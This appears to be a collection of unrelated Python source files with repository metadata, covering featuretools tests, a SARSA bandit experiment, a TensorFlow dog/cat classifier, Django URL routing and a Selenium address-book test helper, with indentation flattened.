assert np.isclose(mock_progress_callback.progress_history[-2], FEATURE_CALCULATION_PERCENTAGE * 100)
assert np.isclose(mock_progress_callback.total_update, 100.0)
assert np.isclose(mock_progress_callback.total_progress_percent, 100.0)
def test_calls_progress_callback_cluster(pd_mock_customer):
class MockProgressCallback:
def __init__(self):
self.progress_history = []
self.total_update = 0
self.total_progress_percent = 0
def __call__(self, update, progress_percent, time_elapsed):
self.total_update += update
self.total_progress_percent = progress_percent
self.progress_history.append(progress_percent)
mock_progress_callback = MockProgressCallback()
trans_per_session = ft.Feature(pd_mock_customer["transactions"]["transaction_id"], parent_entity=pd_mock_customer["sessions"], primitive=Count)
trans_per_customer = ft.Feature(pd_mock_customer["transactions"]["transaction_id"], parent_entity=pd_mock_customer["customers"], primitive=Count)
features = [trans_per_session, ft.Feature(trans_per_customer, entity=pd_mock_customer["sessions"])]
with cluster() as (scheduler, [a, b]):
dkwargs = {'cluster': scheduler['address']}
calculate_feature_matrix(features,
entityset=pd_mock_customer,
progress_callback=mock_progress_callback,
dask_kwargs=dkwargs)
assert np.isclose(mock_progress_callback.total_update, 100.0)
assert np.isclose(mock_progress_callback.total_progress_percent, 100.0)
def test_closes_tqdm(es):
class ErrorPrim(TransformPrimitive):
'''A primitive whose function raises an error'''
name = "error_prim"
input_types = [ft.variable_types.Numeric]
return_type = "Numeric"
compatibility = [Library.PANDAS, Library.DASK, Library.KOALAS]
def get_function(self):
def error(s):
raise RuntimeError("This primitive has errored")
return error
value = ft.Feature(es['log']['value'])
property_feature = value > 10
error_feature = ft.Feature(value, primitive=ErrorPrim)
calculate_feature_matrix([property_feature],
es,
verbose=True)
assert len(tqdm._instances) == 0
try:
calculate_feature_matrix([value, error_feature],
es,
verbose=True)
assert False
except RuntimeError as e:
assert e.args[0] == "This primitive has errored"
finally:
assert len(tqdm._instances) == 0
def test_approximate_with_single_cutoff_warns(pd_es):
features = dfs(entityset=pd_es,
target_entity='customers',
features_only=True,
ignore_entities=['cohorts'],
agg_primitives=['sum'])
match = "Using approximate with a single cutoff_time value or no cutoff_time " \
"provides no computational efficiency benefit"
# test warning with single cutoff time
with pytest.warns(UserWarning, match=match):
calculate_feature_matrix(features,
pd_es,
cutoff_time=pd.to_datetime("2020-01-01"),
approximate="1 day")
# test warning with no cutoff time
with pytest.warns(UserWarning, match=match):
calculate_feature_matrix(features,
pd_es,
approximate="1 day")
# check proper handling of approximate
feature_matrix = calculate_feature_matrix(features,
pd_es,
cutoff_time=pd.to_datetime("2011-04-09 10:31:30"),
approximate="1 minute")
expected_values = [50, 50, 50]
assert (feature_matrix['régions.SUM(log.value)'] == expected_values).values.all()
def test_calc_feature_matrix_with_cutoff_df_and_instance_ids(es):
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
instances = range(17)
cutoff_time = pd.DataFrame({'time': times, es['log'].index: instances})
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
property_feature = ft.Feature(es['log']['value']) > 10
match = "Passing 'instance_ids' is valid only if 'cutoff_time' is a single value or None - ignoring"
with pytest.warns(UserWarning, match=match):
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
instance_ids=[1, 3, 5],
verbose=True)
feature_matrix = to_pandas(feature_matrix)
assert (feature_matrix[property_feature.get_name()] == labels).values.all()
def test_calculate_feature_matrix_returns_default_values(default_value_es):
sum_features = ft.Feature(default_value_es["transactions"]["value"],
parent_entity=default_value_es["sessions"], primitive=Sum)
sessions_sum = ft.Feature(sum_features,
entity=default_value_es["transactions"])
feature_matrix = ft.calculate_feature_matrix(features=[sessions_sum],
entityset=default_value_es)
feature_matrix = to_pandas(feature_matrix, index='id', sort_index=True)
expected_values = [2.0, 2.0, 1.0, 0.0]
assert (feature_matrix[sessions_sum.get_name()] == expected_values).values.all()
def test_entities_relationships(entities, relationships):
fm_1, features = ft.dfs(entities=entities,
relationships=relationships,
target_entity="transactions")
fm_2 = calculate_feature_matrix(features=features,
entities=entities,
relationships=relationships)
fm_1 = to_pandas(fm_1, index='id', sort_index=True)
fm_2 = to_pandas(fm_2, index='id', sort_index=True)
assert fm_1.equals(fm_2)
def test_no_entities(entities, relationships):
features = ft.dfs(entities=entities,
relationships=relationships,
target_entity="transactions",
features_only=True)
msg = "No entities or valid EntitySet provided"
with pytest.raises(TypeError, match=msg):
calculate_feature_matrix(features=features,
entities=None,
relationships=None)
def test_no_relationships(entities):
fm_1, features = ft.dfs(entities=entities,
relationships=None,
target_entity="transactions")
fm_2 = calculate_feature_matrix(features=features,
entities=entities,
relationships=None)
fm_1 = to_pandas(fm_1, index='id')
fm_2 = to_pandas(fm_2, index='id')
assert fm_1.equals(fm_2)
|
[
"you@example.com"
] |
you@example.com
|
c1932ced18cc4d0c93dce745c12cbbb5cfb102d5
|
c4a077e134f9f6a78b20b13ab329c582416e4ee9
|
/research/sweepSarsa.py
|
cc9314c4de238df0fb2fcde6fb78d94867bba7aa
|
[] |
no_license
|
mcmachado/ALEResearch
|
347e9b7ae58cf900dcf07f4a1a562c7b1d4a747d
|
e4924e8ad8beb156d4937f8b4213ea1dcf76b8fd
|
refs/heads/master
| 2021-01-10T07:30:48.244905
| 2016-11-28T00:16:40
| 2016-11-28T00:16:40
| 36,131,343
| 7
| 2
| null | 2015-10-01T23:33:06
| 2015-05-23T16:17:29
|
C++
|
UTF-8
|
Python
| false
| false
| 3,274
|
py
|
import sys
import random as r
import numpy as np
import statistics as stat
RMAX = 9.0
params = [0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1, 5.0]
class Bandits:
numArms = 2
mus = [1.0, 3.0]
sigmas = [0.5, 9.0]
print 'N(', mus[0], ',', sigmas[0], ') N(', mus[1], ',', sigmas[1], ') RMAX:', RMAX
def __init__(self, s, numIterations):
np.random.seed(seed=s)
self.arms = []
self.currIdx = []
for i in xrange(self.numArms):
self.currIdx.append(0)
self.arms.append([])
self.arms[i] = np.random.normal(self.mus[i], self.sigmas[i], numIterations + 1)
def pullArm(self, i):
assert(i < self.numArms)
self.currIdx[i] += 1
return self.arms[i][self.currIdx[i] - 1]
def resetEnv(self):
for i in xrange(self.numArms):
self.currIdx[i] = 0
def epsilonGreedy(theta, epsilon = 0.05):
argmax = np.argmax(theta)
if r.randint(1, 100) < int(epsilon * 100):
return r.randint(0, len(theta)-1)
else:
return argmax
''' Regular SARSA(0) implementation using a fixed step-size and
an epsilon-greedy policy.'''
def SARSA(b, numIterations, stepSize, optimism=0):
theta = []
acumReturn = 0
alpha = stepSize
for i in xrange(b.numArms):
theta.append(optimism)
for t in xrange(numIterations):
i = epsilonGreedy(theta)
reward = b.pullArm(i)
acumReturn += reward
theta[i] = theta[i] + alpha * (reward + 0 - theta[i])
return acumReturn
def __init__():
for param in params:
print
print 'Step Size ' + str(param)
lvlOptimism = RMAX
numSeeds = 2000
numIterations = 1000
#Variables that will store the results for all methods
res_MAX = []
res_SARSA_P = []
res_SARSA_O = []
'''Already pull all the arms and store them, this way one can
easily reproduce the results and come back to see other possibilities'''
b = []
for s in xrange(1, numSeeds+1):
b.append(Bandits(s, numIterations))
#Run the experiment x times, where x is the number of seeds
for s in xrange(1, numSeeds + 1):
seed = s
r.seed(seed)
res_MAX.append([])
res_SARSA_P.append([])
res_SARSA_O.append([])
maxReturn = 0
'''First I just calculate the max return one could've get.'''
for i in xrange(numIterations):
maxReturn += max(b[s-1].pullArm(0), b[s-1].pullArm(1))
res_MAX[s-1].append(maxReturn)
b[s-1].resetEnv()
'''Agent following the SARSA(0) pessimistically initialized.'''
r.seed(seed)
res_SARSA_P[s-1].append(SARSA(b[s-1], numIterations, param))
b[s-1].resetEnv()
'''Agent following the SARSA(0) optimistically initialized.'''
r.seed(seed)
res_SARSA_O[s-1].append(SARSA(b[s-1], numIterations, param, lvlOptimism))
b[s-1].resetEnv()
'''Now we can take the average return of each method:'''
res_MAX_avg = []
res_SARSA_P_avg = []
res_SARSA_O_avg = []
for i in xrange(numSeeds):
res_MAX_avg.append(stat.mean(res_MAX[i]))
res_SARSA_P_avg.append(stat.mean(res_SARSA_P[i]))
res_SARSA_O_avg.append(stat.mean(res_SARSA_O[i]))
print 'Max return :', stat.mean(res_MAX_avg), ',', stat.stdev(res_MAX_avg)
print 'SARSA(0) -- pess.:', stat.mean(res_SARSA_P_avg), ',', stat.stdev(res_SARSA_P_avg)
print 'SARSA(0) -- opt. :', stat.mean(res_SARSA_O_avg), ',', stat.stdev(res_SARSA_O_avg)
__init__()
|
[
"marlos.cholodovskis@gmail.com"
] |
marlos.cholodovskis@gmail.com
|
21de9e8f87a9c5280417736eaa4e0dc0c5f84a96
|
f0d70b5e2b4a74aaa5450c46d1edc65ef36c8c60
|
/week4/post_register.py
|
ce637905eb178a59370361b45174731ba2ae71f7
|
[] |
no_license
|
Natthapol-PEET/Internet-System-Programming
|
4cdcb472c4bec4913e5ddbcd71f32c8a2119f8bd
|
329e5723d2984b808a53a164110d9c0fd5fd2135
|
refs/heads/master
| 2022-12-17T09:02:28.392963
| 2020-09-20T15:24:20
| 2020-09-20T15:24:20
| 281,337,304
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 368
|
py
|
import urllib.request as ur
import urllib.parse as up
url = 'http://localhost/Register/register_post.php'
value = {
'name': 'PEET',
'location': '7-225',
'language': 'Python'
}
data = up.urlencode(value)
data = data.encode('ascii')
req = ur.Request(url, data)
with ur.urlopen(req) as res:
data_read = res.read()
print(data_read.decode('ascii'))
|
[
"natthapol.n@ku.th"
] |
natthapol.n@ku.th
|
2b509eb15e65f8db44f4cb66fe93f0a4ab30b00a
|
35ec162983b05964516e3037f4b57baa3552d989
|
/simplist/simplist/urls.py
|
56e2f387b093a8f12e2db7af84c22f6f8f8d7517
|
[] |
no_license
|
techscientist/Simplist
|
dd9e8ab4ef2588e66b5b57102367028bf8264501
|
f0657af76b976b4d6712813ee7fe9db719cdcd47
|
refs/heads/master
| 2020-12-31T01:47:33.706601
| 2016-02-19T01:44:06
| 2016-02-19T01:44:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
"""simplist URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include,url
from django.contrib import admin
urlpatterns = [
url(r'^simplistApp/', include('simplistApp.urls')),
url(r'admin/',admin.site.urls),
]
|
[
"algarc04+github@gmail.com"
] |
algarc04+github@gmail.com
|
79f27119cb73feb73d0a17fd967a8c397a66599d
|
6e73ae0040136441c238e16f8b45c4920246a714
|
/xl.py
|
bb9252779584d36eae25a93ce9426f785dfdb38d
|
[] |
no_license
|
Qzwini/test-python-Excel-
|
1c0adf17ad48c80d3098858b70f70eee9b9281f1
|
6ec427019f645033f9fc2f46a2051bedcff02615
|
refs/heads/master
| 2022-12-17T02:49:18.425075
| 2020-09-15T22:44:37
| 2020-09-15T22:44:37
| 295,862,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
import numpy as np
import pandas as pd
excel_file="xl.xlsx"
df = pd.read_excel(excel_file)
print(df)
|
[
"qzwini@gmail.com"
] |
qzwini@gmail.com
|
437ebcc8ee709f93b5842ce833b1b5047795bdc2
|
b8b11f4a8a2871300d2f909f6ef99ee5f9464900
|
/Part-1/05D.py
|
060abb0318520ddc97a045d2ab63bcc323f4c75d
|
[] |
no_license
|
shabanskaya/Data-Structures-Algorithms-in-Python
|
d9221fd2a2d57f9bfef2a38780aadcf2993656eb
|
4af75257bb96385e028a1909fce52645f3162b5c
|
refs/heads/main
| 2023-01-21T11:10:25.961154
| 2020-12-01T10:05:08
| 2020-12-01T10:05:08
| 317,496,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
n = int(input())
s = input()
a = s.split()
for i in range(1, n-1):
if (int(a[i]) > int(a[i-1])) and (int(a[i]) > int(a[i+1])):
print(i, end = ' ')
elif (int(a[i]) < int(a[i-1])) and (int(a[i]) < int(a[i+1])):
print(i, end = ' ')
|
[
"shabanskaia.ka@phystech.edu"
] |
shabanskaia.ka@phystech.edu
|
4068bc3b5400f96d9ce74cb10d77be3e036e6f0f
|
548f6a3d0478b5e1607a6b326f28ee3a59f5e91c
|
/Chapter03/Dog_cat_classification/CNN_DogvsCat_Classifier.py
|
6274a567e3adba914f7596b5a97eacbbe281fe22
|
[
"MIT"
] |
permissive
|
PacktPublishing/Practical-Convolutional-Neural-Networks
|
c6402550aa0c593f272eefab38c9e135f6c45d0d
|
3ebf6a68ff73c76580f2350a3a2b47b621f346c5
|
refs/heads/master
| 2023-02-09T20:56:40.334280
| 2023-01-30T08:26:25
| 2023-01-30T08:26:25
| 122,965,539
| 32
| 19
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,379
|
py
|
import time
import math
import random
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import Preprocessor
import cv2
import LayersConstructor
from sklearn.metrics import confusion_matrix
from datetime import timedelta
from tensorflow.python.framework import ops
from sklearn.metrics.classification import accuracy_score
from sklearn.metrics import precision_recall_fscore_support
import warnings
warnings.filterwarnings("ignore")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
ops.reset_default_graph()
# Convolutional Layer 1.
filter_size1 = 3
num_filters1 = 32
# Convolutional Layer 2.
filter_size2 = 3
num_filters2 = 32
# Convolutional Layer 3.
filter_size3 = 3
num_filters3 = 64
# Fully-connected layer.
fc_size = 128 # Number of neurons in fully-connected layer.
# Learning rate. Let's make the training slower for more intensive training
learning_rate=1e-4
# Number of color channels for the images: 1 channel for gray-scale.
num_channels = 3
# image dimensions (only squares for now)
img_size = 128
# Size of image when flattened to a single dimension
img_size_flat = img_size * img_size * num_channels
# Tuple with height and width of images used to reshape arrays.
img_shape = (img_size, img_size)
# class info
classes = ['dogs', 'cats']
num_classes = len(classes)
# batch size
batch_size = 32
# validation split
validation_size = 0.16
# how long to wait after validation loss stops improving before terminating training
early_stopping = None # use None if you don't want to implement early stoping
train_path = 'train/'
test_path = 'test/'
checkpoint_dir = "models/"
data = Preprocessor.read_train_sets(train_path, img_size, classes, validation_size=validation_size)
test_images, test_ids = Preprocessor.read_test_set(test_path, img_size)
print("Size of:")
print(" - Training-set:\t\t{}".format(len(data.train.labels)))
print(" - Test-set:\t\t{}".format(len(test_images)))
print(" - Validation-set:\t{}".format(len(data.valid.labels)))
def plot_images(images, cls_true, cls_pred=None):
if len(images) == 0:
print("no images to show")
return
else:
random_indices = random.sample(range(len(images)), min(len(images), 9))
images, cls_true = zip(*[(images[i], cls_true[i]) for i in random_indices])
# Create figure with 3x3 sub-plots.
fig, axes = plt.subplots(3, 3)
fig.subplots_adjust(hspace=0.3, wspace=0.3)
for i, ax in enumerate(axes.flat):
# Plot image.
ax.imshow(images[i].reshape(img_size, img_size, num_channels))
# Show true and predicted classes.
if cls_pred is None:
xlabel = "True: {0}".format(cls_true[i])
else:
xlabel = "True: {0}, Pred: {1}".format(cls_true[i], cls_pred[i])
# Show the classes as the label on the x-axis.
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
# Get some random images and their labels from the train set.
images, cls_true = data.train.images, data.train.cls
# Plot the images and labels using our helper-function above.
plot_images(images=images, cls_true=cls_true)
x = tf.placeholder(tf.float32, shape=[None, img_size_flat], name='x')
x_image = tf.reshape(x, [-1, img_size, img_size, num_channels])
y_true = tf.placeholder(tf.float32, shape=[None, num_classes], name='y_true')
y_true_cls = tf.argmax(y_true, axis=1)
layer_conv1, weights_conv1 = \
LayersConstructor.new_conv_layer(input=x_image,
num_input_channels=num_channels,
filter_size=filter_size1,
num_filters=num_filters1,
use_pooling=True)
layer_conv2, weights_conv2 = \
LayersConstructor.new_conv_layer(input=layer_conv1,
num_input_channels=num_filters1,
filter_size=filter_size2,
num_filters=num_filters2,
use_pooling=True)
layer_conv3, weights_conv3 = \
LayersConstructor.new_conv_layer(input=layer_conv2,
num_input_channels=num_filters2,
filter_size=filter_size3,
num_filters=num_filters3,
use_pooling=True)
layer_flat, num_features = LayersConstructor.flatten_layer(layer_conv3)
layer_fc1 = LayersConstructor.new_fc_layer(input=layer_flat,
num_inputs=num_features,
num_outputs=fc_size,
use_relu=True)
layer_fc2 = LayersConstructor.new_fc_layer(input=layer_fc1,
num_inputs=fc_size,
num_outputs=num_classes,
use_relu=False)
y_pred = tf.nn.softmax(layer_fc2)
y_pred_cls = tf.argmax(y_pred, axis=1)
cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=layer_fc2,
labels=y_true)
cost = tf.reduce_mean(cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
correct_prediction = tf.equal(y_pred_cls, y_true_cls)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
init_op = tf.global_variables_initializer()
session = tf.Session()
session.run(init_op)
train_batch_size = batch_size
acc_list = []
val_acc_list = []
def print_progress(epoch, feed_dict_train, feed_dict_validate, val_loss):
# Calculate the accuracy on the training-set.
acc = session.run(accuracy, feed_dict=feed_dict_train)
val_acc = session.run(accuracy, feed_dict=feed_dict_validate)
return acc, val_acc
# Counter for total number of iterations performed so far.
total_iterations = 0
iter_list = []
def optimize(num_iterations):
# Ensure we update the global variable rather than a local copy.
global total_iterations
# Start-time used for printing time-usage below.
start_time = time.time()
best_val_loss = float("inf")
patience = 0
for i in range(total_iterations, total_iterations + num_iterations):
# Get a batch of training examples.
# x_batch now holds a batch of images and
# y_true_batch are the true labels for those images.
x_batch, y_true_batch, _, cls_batch = data.train.next_batch(train_batch_size)
x_valid_batch, y_valid_batch, _, valid_cls_batch = data.valid.next_batch(train_batch_size)
# Convert shape from [num examples, rows, columns, depth]
# to [num examples, flattened image shape]
x_batch = x_batch.reshape(train_batch_size, img_size_flat)
x_valid_batch = x_valid_batch.reshape(train_batch_size, img_size_flat)
# Put the batch into a dict with the proper names
# for placeholder variables in the TensorFlow graph.
feed_dict_train = {x: x_batch, y_true: y_true_batch}
feed_dict_validate = {x: x_valid_batch, y_true: y_valid_batch}
# Run the optimizer using this batch of training data.
# TensorFlow assigns the variables in feed_dict_train
# to the placeholder variables and then runs the optimizer.
session.run(optimizer, feed_dict=feed_dict_train)
# Print status at end of each epoch (defined as full pass through training Preprocessor).
if i % int(data.train.num_examples/batch_size) == 0:
val_loss = session.run(cost, feed_dict=feed_dict_validate)
epoch = int(i / int(data.train.num_examples/batch_size))
acc, val_acc = print_progress(epoch, feed_dict_train, feed_dict_validate, val_loss)
msg = "Epoch {0} --- Training Accuracy: {1:>6.1%}, Validation Accuracy: {2:>6.1%}, Validation Loss: {3:.3f}"
print(msg.format(epoch + 1, acc, val_acc, val_loss))
print(acc)
acc_list.append(acc)
val_acc_list.append(val_acc)
iter_list.append(epoch+1)
if early_stopping:
if val_loss < best_val_loss:
best_val_loss = val_loss
patience = 0
else:
patience += 1
if patience == early_stopping:
break
# Update the total number of iterations performed.
total_iterations += num_iterations
# Ending time.
end_time = time.time()
# Difference between start and end-times.
time_dif = end_time - start_time
# Print the time-usage.
print("Time elapsed: " + str(timedelta(seconds=int(round(time_dif)))))
def plot_example_errors(cls_pred, correct):
# cls_pred is an array of the predicted class-number for
# all images in the test-set.
# correct is a boolean array whether the predicted class
# is equal to the true class for each image in the test-set.
# Negate the boolean array.
incorrect = (correct == False)
# Get the images from the test-set that have been
# incorrectly classified.
images = data.valid.images[incorrect]
# Get the predicted classes for those images.
cls_pred = cls_pred[incorrect]
# Get the true classes for those images.
cls_true = data.valid.cls[incorrect]
# Plot the first 9 images.
plot_images(images=images[0:9], cls_true=cls_true[0:9], cls_pred=cls_pred[0:9])
def plot_confusion_matrix(cls_pred):
# cls_pred is an array of the predicted class-number for
# all images in the test-set.
# Get the true classifications for the test-set.
cls_true = data.valid.cls
# Get the confusion matrix using sklearn.
cm = confusion_matrix(y_true=cls_true, y_pred=cls_pred)
# Compute the precision, recall and f1 score of the classification
p, r, f, s = precision_recall_fscore_support(cls_true, cls_pred, average='weighted')
print('Precision:', p)
print('Recall:', r)
print('F1-score:', f)
# Print the confusion matrix as text.
print(cm)
# Plot the confusion matrix as an image.
plt.matshow(cm)
# Make various adjustments to the plot.
plt.colorbar()
tick_marks = np.arange(num_classes)
plt.xticks(tick_marks, range(num_classes))
plt.yticks(tick_marks, range(num_classes))
plt.xlabel('Predicted')
plt.ylabel('True')
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
def print_validation_accuracy(show_example_errors=False, show_confusion_matrix=False):
# Number of images in the test-set.
num_test = len(data.valid.images)
# Allocate an array for the predicted classes which
# will be calculated in batches and filled into this array.
cls_pred = np.zeros(shape=num_test, dtype=np.int)
# Now calculate the predicted classes for the batches.
# We will just iterate through all the batches.
# There might be a more clever and Pythonic way of doing this.
# The starting index for the next batch is denoted i.
i = 0
while i < num_test:
# The ending index for the next batch is denoted j.
j = min(i + batch_size, num_test)
# Get the images from the test-set between index i and j.
images = data.valid.images[i:j, :].reshape(batch_size, img_size_flat)
# Get the associated labels.
labels = data.valid.labels[i:j, :]
# Create a feed-dict with these images and labels.
feed_dict = {x: images, y_true: labels}
# Calculate the predicted class using TensorFlow.
cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict)
# Set the start-index for the next batch to the
# end-index of the current batch.
i = j
cls_true = np.array(data.valid.cls)
cls_pred = np.array([classes[x] for x in cls_pred])
# Create a boolean array whether each image is correctly classified.
correct = (cls_true == cls_pred)
# Calculate the number of correctly classified images.
# When summing a boolean array, False means 0 and True means 1.
correct_sum = correct.sum()
# Classification accuracy is the number of correctly classified
# images divided by the total number of images in the test-set.
acc = float(correct_sum) / num_test
# Print the accuracy.
msg = "Accuracy on Test-Set: {0:.1%} ({1} / {2})"
print(msg.format(acc, correct_sum, num_test))
# Plot some examples of mis-classifications, if desired.
if show_example_errors:
print("Example errors:")
plot_example_errors(cls_pred=cls_pred, correct=correct)
# Plot the confusion matrix, if desired.
if show_confusion_matrix:
print("Confusion Matrix:")
plot_confusion_matrix(cls_pred=cls_pred)
#Evaluation and optimization
optimize(num_iterations=10000)
print(acc_list)
# Plot loss over time
plt.plot(iter_list, acc_list, 'r--', label='CNN training accuracy per iteration', linewidth=4)
plt.title('CNN training accuracy per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN training accuracy')
plt.legend(loc='upper right')
plt.show()
# Plot loss over time
plt.plot(iter_list, val_acc_list, 'r--', label='CNN validation accuracy per iteration', linewidth=4)
plt.title('CNN validation accuracy per iteration')
plt.xlabel('Iteration')
plt.ylabel('CNN validation accuracy')
plt.legend(loc='upper right')
plt.show()
print_validation_accuracy(show_example_errors=True, show_confusion_matrix=True)
plt.axis('off')
test_cat = cv2.imread('Test_image/cat.jpg')
test_cat = cv2.resize(test_cat, (img_size, img_size), cv2.INTER_LINEAR) / 255
preview_cat = plt.imshow(test_cat.reshape(img_size, img_size, num_channels))
test_dog = cv2.imread('Test_image/dog.jpg')
test_dog = cv2.resize(test_dog, (img_size, img_size), cv2.INTER_LINEAR) / 255
preview_dog = plt.imshow(test_dog.reshape(img_size, img_size, num_channels))
def sample_prediction(test_im):
feed_dict_test = {
x: test_im.reshape(1, img_size_flat),
y_true: np.array([[1, 0]])
}
test_pred = session.run(y_pred_cls, feed_dict=feed_dict_test)
return classes[test_pred[0]]
print("Predicted class for test_cat: {}".format(sample_prediction(test_cat)))
print("Predicted class for test_dog: {}".format(sample_prediction(test_dog)))
session.close()
|
[
"sagarsawant@packtpub.com"
] |
sagarsawant@packtpub.com
|
6fc944fca5a95025ed8dab29e533b8023e0b67d7
|
1c849dda331977bbfc1c2c1f511bc191a577c37a
|
/fixture/contact.py
|
749ab3b5914129a15cd811120e21181eea887fff
|
[
"Apache-2.0"
] |
permissive
|
Kassaidre/python-training
|
84255d46f5c347063bdfdf5ae16aacabdd86ba50
|
c8e54796d78dd7de84ba57cc8cfbeecd1298f466
|
refs/heads/master
| 2016-08-12T19:27:12.531516
| 2016-03-11T16:40:24
| 2016-03-11T16:40:24
| 50,449,832
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,719
|
py
|
from model.contact import Contact
import re
class ContactHelper:
def __init__(self, app):
self.app = app
def create(self, contact):
wd = self.app.wd
# init contact creation
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contact)
# submit contact creation
wd.find_element_by_name("submit").click()
self.return_to_home_page()
self.contact_cache = None
def fill_contact_form(self, contact):
wd = self.app.wd
self.change_field_value("firstname", contact.firstname)
self.change_field_value("middlename", contact.middlename)
self.change_field_value("lastname", contact.lastname)
self.change_field_value("nickname", contact.nickname)
self.change_field_value("title", contact.title)
self.change_field_value("company", contact.company)
self.change_field_value("address", contact.address)
self.change_field_value("home", contact.home)
self.change_field_value("mobile", contact.mobile)
self.change_field_value("work", contact.work)
self.change_field_value("fax", contact.fax)
self.change_field_value("email", contact.email)
self.change_field_value("email2", contact.email2)
self.change_field_value("email3", contact.email3)
self.change_field_value("homepage", contact.homepage)
self.change_field_value("byear", contact.byear)
self.change_field_value("ayear", contact.ayear)
self.change_field_value("address2", contact.address2)
self.change_field_value("phone2", contact.phone2)
self.change_field_value("notes", contact.notes)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.select_contact_by_index(index)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def delete_contact_by_id(self, id):
wd = self.app.wd
self.select_contact_by_id(id)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.return_to_home_page()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def modify_contact_by_index(self, index, new_contact_data):
wd = self.app.wd
all_rows = wd.find_elements_by_name("entry")
row = all_rows[index]
cells = row.find_elements_by_tag_name("td")
cells[7].find_element_by_tag_name("a").click()
self.fill_contact_form(new_contact_data)
#submit modification
wd.find_element_by_name("update").click()
wd.find_element_by_link_text("home").click()
self.contact_cache = None
def add_contact_to_group(self, id):
wd = self.app.wd
self.select_contact_by_id(id)
wd.find_element_by_xpath("//div[@class='right']/select//option[2]").is_selected()
wd.find_element_by_xpath("//div[@class='right']/select//option[2]").click()
wd.find_element_by_name("add").click()
self.return_to_home_page()
def delete_contact_from_group(self, id):
wd = self.app.wd
wd.find_element_by_xpath("//form[@id='right']/select//option[4]").is_selected()
wd.find_element_by_xpath("//form[@id='right']/select//option[4]").click()
self.select_contact_by_id(id)
wd.find_element_by_name("remove").click()
self.return_to_home_page()
def modify_first_contact(self):
self.modify_contact_by_index(0)
def return_to_home_page(self):
wd = self.app.wd
wd.find_element_by_link_text("home").click()
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def select_first_item(self):
wd = self.app.wd
wd.find_element_by_name("selected[]").click()
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def select_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def count(self):
wd = self.app.wd
self.return_to_home_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.return_to_home_page()
self.contact_cache = []
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
firstname = cells[2].text
lastname = cells[1].text
# id = element.find_element_by_name("selected[]").get_attribute("value")
id = cells[0].find_element_by_tag_name("input").get_attribute("value")
all_phones = cells[5].text
all_emails = cells[4].text
address = cells[3].text
self.contact_cache.append(Contact(firstname=firstname, lastname=lastname, id=id,
all_phones_from_home_page=all_phones, all_emails_from_home_page=all_emails, address=address))
return list(self.contact_cache)
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
self.return_to_home_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self, index):
wd = self.app.wd
self.return_to_home_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def get_contact_info_from_edit_page(self, index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
home = wd.find_element_by_name("home").get_attribute("value")
mobile = wd.find_element_by_name("mobile").get_attribute("value")
work = wd.find_element_by_name("work").get_attribute("value")
phone2 = wd.find_element_by_name("phone2").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
